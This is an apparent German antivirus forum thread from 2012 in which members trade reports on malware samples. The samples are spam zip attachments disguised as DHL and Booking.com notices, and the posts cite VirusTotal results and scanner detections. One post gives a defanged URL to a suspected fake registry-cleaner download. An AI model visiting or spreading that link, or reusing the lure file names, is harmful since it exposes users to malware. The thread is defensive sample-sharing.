Klar...schnell...mal eben so... Ich weiß sehr wohl, was mal eben schnell ist Schnell ist doch relativ... Schau mal auf das 2.Bild, wie lange laut diesem Super-Tool mein Notebook zum booten braucht. In diesem Kontext sind 30min Test sehr schnell. -------------------- Don't believe the hype!
|
|
|
11.04.2012, 20:35
Beitrag
#4356
|
|
Gehört zum Inventar Gruppe: Mitglieder Beiträge: 2.051 Mitglied seit: 15.10.2006 Mitglieds-Nr.: 5.448 Betriebssystem: Win7 Prof. x64 Virenscanner: GDATA TP 20xx Firewall: GDATA TP 20xx |
Gestern bzw. vorgestern per Mail erhalten (auf meine Spam-Adresse):
Mail 1: DHL-Express-Delivery-Notification-Details_04-2012-CY1CF260.zip https://www.virustotal.com/file/65919470080...sis/1334171837/ -> Wird von G Data mit Signaturenstand vom 2.4.2012 nicht erkannt. Führt man das Sample aus, meldet sich sofort der BB und löscht alles. Mail 2: Reservation-Details-From-Booking-Com_04041257132.zip https://www.virustotal.com/file/1974326b8a7...sis/1334171955/ -> Wird ebenfalls nicht mit alten Signaturen erkannt, ist jedoch leider in einer VM nicht lauffähig... ich brauche einen physischen Testrechner. xD |
|
|
15.04.2012, 14:17
Beitrag
#4357
|
|
Fühlt sich hier wohl Gruppe: Mitglieder Beiträge: 323 Mitglied seit: 15.02.2010 Mitglieds-Nr.: 7.945 Betriebssystem: Windows 10 x64 |
hxxp://www.registry-scan.org/registrycleanpro/?langcode=de&xat=ggde
Scheint ein Fake Programm (beschleunigen sie ihren PC) zu sein , NOD erkennt es beim herunterladen durch ESET Live Grid als potenzielle unerwünscht Anwendung und blockiert es. https://www.virustotal.com/file/f579202ae92...sis/1334495189/ Der Beitrag wurde von Xeon bearbeitet: 15.04.2012, 14:58 |
|
|
15.04.2012, 14:33
Beitrag
#4358
|
|
Ist unverzichtbar Gruppe: Freunde Beiträge: 5.267 Mitglied seit: 30.11.2003 Wohnort: Dortmund Mitglieds-Nr.: 242 Betriebssystem: Windows 10 Prof 64Bit Virenscanner: GData/ MS Defender Firewall: Router/ Windows 10 |
Hast du die Datei noch? Würde sie dann mal durch BitDefender jagen wollen...
Bis denen olli -------------------- ...und sonst bin ich mit einem VW T3 oder einer V-Strom unterwegs...
|
|
|
15.04.2012, 15:39
Beitrag
#4359
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 11.168 Mitglied seit: 28.11.2004 Mitglieds-Nr.: 1.621 Betriebssystem: Windows 10 pro x64 Virenscanner: Emsisoft Anti-Malware Firewall: Sandboxie | cFos |
URL aufrufen?
-------------------- Yours sincerely
Uwe Kraatz |
|
|
15.04.2012, 15:41
Beitrag
#4360
|
|
Ist unverzichtbar Gruppe: Freunde Beiträge: 5.267 Mitglied seit: 30.11.2003 Wohnort: Dortmund Mitglieds-Nr.: 242 Betriebssystem: Windows 10 Prof 64Bit Virenscanner: GData/ MS Defender Firewall: Router/ Windows 10 |
Bin ich blöd
Bis denne Olli -------------------- ...und sonst bin ich mit einem VW T3 oder einer V-Strom unterwegs...
|
|
|
Vereinfachte Darstellung | Aktuelles Datum: 08.05.2024, 04:17 |